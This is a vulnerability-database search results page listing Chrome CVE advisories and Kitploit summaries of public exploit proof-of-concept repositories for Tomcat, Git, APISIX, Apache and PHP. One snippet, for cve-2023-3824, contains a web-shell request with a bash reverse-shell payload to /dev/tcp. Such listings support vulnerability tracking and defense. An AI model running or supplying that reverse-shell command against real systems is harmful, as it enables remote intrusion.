Lucene search
+L

630654 matches found

NVD
NVD
added 2026/09/09 1:17 a.m.4 views

CVE-2026-87464

Use after free in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. Chromium security severity: Critical...

9.6CVSS0.00281EPSS
SaveExploits0References2
OSV
OSV
added 2026/09/09 1:17 a.m.2 views

DEBIAN-CVE-2026-87460

Use after free in Platform in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. Chromium security severity: High...

8.8CVSS0.00215EPSS
SaveExploits0References1
NVD
NVD
added 2026/09/09 1:17 a.m.5 views

CVE-2026-87460

Use after free in Platform in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. Chromium security severity: High...

8.8CVSS0.00215EPSS
SaveExploits0References2
OSV
OSV
added 2026/09/09 1:17 a.m.5 views

DEBIAN-CVE-2026-87464

Use after free in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. Chromium security severity: Critical...

9.6CVSS0.00281EPSS
SaveExploits0References1
OSV
OSV
added 2026/09/09 1:17 a.m.3 views

DEBIAN-CVE-2026-87455

Use after free in Aura in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. Chromium security severity: Medium...

9.6CVSS0.00256EPSS
SaveExploits0References1
NVD
NVD
added 2026/09/09 1:17 a.m.4 views

CVE-2026-87455

Use after free in Aura in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. Chromium security severity: Medium...

9.6CVSS0.00256EPSS
SaveExploits0References2
NVD
NVD
added 2026/09/09 1:17 a.m.5 views

CVE-2026-87448

Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. Chromium security severity: Low...

9.6CVSS0.00354EPSS
SaveExploits0References2
NVD
NVD
added 2026/09/09 1:17 a.m.5 views

CVE-2026-87438

Out of bounds write in WebGL in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. Chromium security severity: Critical...

9.6CVSS0.00386EPSS
SaveExploits0References2
NVD
NVD
added 2026/09/09 1:17 a.m.4 views

CVE-2026-87440

Out of bounds read in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. Chromium security severity: High...

8.8CVSS0.00354EPSS
SaveExploits0References2
NVD
NVD
added 2026/09/09 1:17 a.m.3 views

CVE-2026-87444

Memory corruption in Codecs in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. Chromium security severity: High...

8.8CVSS0.00354EPSS
SaveExploits0References2
NVD
NVD
added 2026/09/09 1:16 a.m.4 views

CVE-2026-87430

Buffer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted HTML page. Chromium security severity: Low...

8.8CVSS0.00357EPSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/09 1:16 a.m.10 views

CVE-2017-11882

CVE-2017-11882 43b original script from https://github.com/embedi/CVE-2017-11882 109b original script from https://github.com/unamer/CVE-2017-11882/ Kudos, now unamer's code can execute shellcode CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE...

9.3CVSS7.8AI score0.99945EPSS
SaveExploits33References2
Kitploit
Kitploit
added 2026/09/09 1:16 a.m.7 views

tomcat-cve-2017-12617

Tomcat CVE-2017-12617 Exploit/PoC Apache Tomcat 9.0.1 Beta / 8.5.23 / 8.0.47 / 7.0.8 - JSP Upload Bypass / Remote Code Execution for Python3 I just made a few adjustments to the original script to be compatible with Python 3! If there's any problems or issues faced, feel free to shoot me an email...

8.1CVSS7.4AI score0.99988EPSS
SaveExploits23
Kitploit
Kitploit
added 2026/09/09 1:15 a.m.5 views

cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration

CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration CVE-2018-11235-Git PoC and tunneling with docker ngrok Build Dockerfile root@kitploit: $ docker build -t cve-2018-11235 . Create custom network for ngrok root@kitploit: $ docker network create myngroknet Start Git Http Server...

7.8CVSS7.6AI score0.48752EPSS
SaveExploits10References3
Kitploit
Kitploit
added 2026/09/09 1:15 a.m.9 views

cve-2022-24112

Apache APISIX 2.12.1 Remote Code Execution and Docker Lab Let's clone using gitclone this repository, then we can navigate to apisix-docker/examples. In this docker-compose.yml file, we already change into image: apache/apisix:2.12.0-alpine, because the vulnerability in this version, then let's...

9.8CVSS8.4AI score0.96001EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/09 1:14 a.m.8 views

cve-2018-11776-docker

Contenedor Docker y exploit PoC de CVE-2018-11776 escrito en Go Puedes construir tu propia imagen y ejecutarla: root@kitploit: docker build . -t yourimagename docker container run -it --rm -p 8080:8080 yourimagename O simplemente puedes usar la que creé con cariño para ti: root@kitploit: docker...

9.3CVSS8.2AI score0.99991EPSS
SaveExploits42References1
Kitploit
Kitploit
added 2026/09/09 1:14 a.m.10 views

mantis_rce

mantisrce Python script to obtain RCE on Mantis Bug Tracker prior to version 1.2.x Check CVE-2008-4687 for additional information...

9CVSS5.9AI score0.67453EPSS
SaveExploits5
RedhatCVE
RedhatCVE
added 2026/09/09 1:14 a.m.4 views

CVE-2026-87633

A flaw was found in chromium-browser. This use-after-free vulnerability allows a local attacker to execute arbitrary code outside of the sandbox environment. The exploitation occurs through user interface UI interaction, leading to a compromise of the system beyond the intended security boundarie...

8.6CVSS0.00202EPSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/09 1:14 a.m.6 views

cve-2023-3824

sudo docker run -it --rm -p 8080:80 php:8.0.29-apache bash echo "phar.readonly = Off" /usr/local/etc/php/php.ini http://localhost:8080/shell.php?cmd=bash -c 'bash -i %26 /dev/tcp/192.168.1.8/5050 0%261' php -r "$phar = new Phar'exploit.phar'; $phar-extractTo'./', 'shell.php';" exploit.zip pass:...

9.8CVSS7.2AI score0.21786EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/09 1:13 a.m.7 views

cve-2021-41773

CVE-2021-41773 CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited Apache HTTP Server CVE-2021-41773 Exploited in the Wild CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 incomplete fix of CVE-2021-41773 Shodan oneliner...

9.8CVSS8.1AI score0.99992EPSS
SaveExploits190
Rows per page
Query Builder